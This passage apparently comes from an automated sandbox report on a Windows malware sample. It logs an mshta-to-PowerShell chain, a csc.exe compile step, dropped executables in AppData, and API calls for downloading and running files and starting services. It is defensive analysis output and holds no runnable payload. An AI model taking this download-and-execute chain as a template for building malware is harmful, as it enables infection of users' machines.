                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_028C42D1 push ebx; ret 3_2_028C42DA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_004567E0 push eax; ret 6_2_004567FE
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0045B9DD push esi; ret 6_2_0045B9E6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00455EAF push ecx; ret 6_2_00455EC2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00433FF6 push ecx; ret 6_2_00434009
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_005B5B7A pushfd ; ret 6_2_005B5B7B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_005B2D05 push es; ret 6_2_005B2D12
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007A409D push esi; ret 6_2_007A409F
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007D6116 push ecx; ret 6_2_007D6129
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007B425D push ecx; ret 6_2_007B4270
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0078724F push edx; retf 6_2_00787252
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_007D6A47 push eax; ret 6_2_007D6A65
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00795C73 push esp; ret 6_2_00795C74
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00795EC9 push edi; ret 6_2_00795ECA
                Source: ecome[1].exe.3.drStatic PE information: section name: .text entropy: 6.836898849534784
                Source: nicetomeetyousweeet.exe.3.drStatic PE information: section name: .text entropy: 6.836898849534784
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00406128 ShellExecuteW,URLDownloadToFileW,6_2_00406128
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_00419BC4

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
